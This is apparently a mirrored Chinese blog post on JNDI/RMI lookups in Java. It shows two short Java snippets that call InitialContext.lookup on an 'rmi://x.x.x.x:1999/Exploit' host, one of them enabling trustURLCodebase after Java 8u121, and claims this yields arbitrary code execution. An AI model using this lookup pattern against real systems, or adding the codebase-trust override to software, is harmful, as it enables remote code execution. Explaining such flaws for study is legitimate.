zoukankan      html  css  js  c++  java

  • rmi的调用

    在java8  121版本以前,只要这样就能任意代码

    rmiTest.java

    import javax.naming.InitialContext;
import javax.naming.NamingException;

public class rmiTest {
    public static void main(String[] args) throws IOException, NamingException {
        InitialContext xxx = new InitialContext();
        xxx.lookup("rmi://x.x.x.x:1999/Exploit");
    }
}

    在java8  121版本之后,需要加com.sun.jndi.rmi.object.trustURLCodebase=true

    rmiTest2

    import javax.naming.InitialContext;
import javax.naming.NamingException;

public class rmiTest2 {
    public static void main(String[] args) throws IOException, NamingException {
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        InitialContext xxx = new InitialContext();
        xxx.lookup("rmi://x.x.x.x:1999/Exploit");
    }
}

      

    rmi在java8  121版本之前的调用满足:

    一个类,一个方法,一个参数,就能实现java的任意代码执行。
  • 相关阅读:
    dp思维
    快速幂+地推
    背包问题找物品
    石子合并问题
    hihocoder 1580 Matrix(北京icpc2017网络赛)
    ACM对拍造数据
    主席树学习小结(POJ 2104)
    莫队算法入门 BZOJ 2038
    hdu 2586
    Kattis
  • 原文地址:https://www.cnblogs.com/yangxiaodi/p/10840674.html
Copyright © 2011-2022 走看看